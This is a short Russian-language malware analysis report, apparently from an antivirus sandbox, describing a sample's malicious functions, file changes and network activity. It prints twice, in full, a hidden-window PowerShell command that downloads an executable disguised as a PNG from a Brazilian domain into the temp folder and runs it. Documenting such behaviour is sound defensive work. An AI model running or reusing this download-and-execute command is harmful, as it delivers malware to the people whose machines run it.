Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- http://artslogan.com.br/images/jhfkjsdhfntnt.png как %temp%\yatzxwe.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://artslogan.com.br/images/jhfkjsdhfntnt.png','%TMP%\yatzxwe.exe');Start-Process '%TMP%\yatzxwe.exe';
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1352
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1101491.cvr
Сетевая активность
Подключается к
- 'ar####gan.com.br':80
TCP
Запросы HTTP GET
- http://ar####gan.com.br/images/jhfkjsdhfntnt.png
UDP
- DNS ASK ar####gan.com.br
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://artslogan.com.br/images/jhfkjsdhfntnt.png','%TMP%\yatzxwe.exe');Start-Process '%TMP%\yatzxwe.exe';' (со скрытым окном)
